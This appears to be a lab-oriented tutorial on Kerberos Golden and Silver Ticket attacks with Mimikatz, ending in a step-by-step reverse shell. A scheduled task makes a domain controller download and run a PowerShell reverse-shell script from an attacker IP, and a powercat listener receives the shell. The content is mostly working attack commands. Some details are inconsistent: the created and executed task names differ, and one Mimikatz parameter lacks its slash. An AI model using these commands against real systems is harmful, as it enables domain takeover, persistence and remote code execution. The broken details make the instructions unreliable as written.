Golden/Silver Ticket

Golden/Silver Ticket without Metasploit

Golden Ticket

Golden Ticket is a persistence mechanism, it is signed and encrypted with NTLM hash of krbtgt account. In simple words, Golden Ticket is a valid Ticket Granting Ticket(TGT) used to obtain access to different services. We can use the Golden Ticket to impersonate any user in the domain.
Once you get the NTLM hash of krbtgt account we can use the following Mimikatz command to get a Golden Ticket (We need to run this as a local admin as we will be writing to LSASS process):
Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’
kerberos::golden — Name of the Mimikatz Module
user — Name of the user for whom we are requesting the TGT (doesn’t need to be a valid name as account validation is not done by the DC until TGT is older than 20 mins)
domain — Name of the target domain
sid — Domain SID (You can use the command Get-DomainSID from PowerView to get this)
krbtgt — NTLM hash of the krbtgt account
id & group —User and Group RID(Optional parameter)
ptt — Inject the ticket into current PowerShell Session (we can use /ticket to save the ticket for later use)
startoffset — When will the ticket be available in minutes(0- right now)(Optional parameter)
endin — Lifetime of ticket in minutes(Optional parameter)
renewmax — Ticket lifetime with renewal in minutes (Optional parameter)
To check if the ticket was created, we can use the following command:
klist
Generating Golden Ticket Using Mimikatz

Silver Ticket

A Silver Ticket on the other hand is a valid Ticket Granting Service(TGS) which is encrypted using the NTLM hash of a service account. Silver Ticket can only be used to access the service with who’s NTLM hash it is encrypted with. Silver Ticket attack is very quite in terms of the logs left behind but at the same time provides limited access.
Once we have the NTLM hash of a target service we can use the following command to request for Silver Ticket:
Invoke-Mimikatz -Command ‘“kerberos::golden /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt”’
The Mimikatz module used here is still kerberos::golden, there is no silver module.
service — the SPN name of service for which we are requesting TGS
rc4 — NTLM hash of target service account
Note: We need a TGS for HOST service in order to schedule task on the target server(required to a get reverse shell from Silver Ticket).
Generating Silver Ticket Using Mimikatz

Getting Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “ABC” /TR “powershell.exe -c ‘ iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)’”
Note: Make sure you are calling the function within the script and have proper IP and port number configured (Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 1024). And the file is host :P
S — Name of the computer on which the task is to be scheduled
SC — Schedule type
RU — User used to create and execute the task
TN — Name of the task
TR — specify the command to run when the task is running
Scheduling a task using schtasks
Step 2: Start a listener
powercat -l -p 443 -v -t 1000
p — port to listen on
t — timeout
Starting Powercat Listener
Step 3: Run the scheduled task.
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN “User14”
Running Scheduled Task
Reference: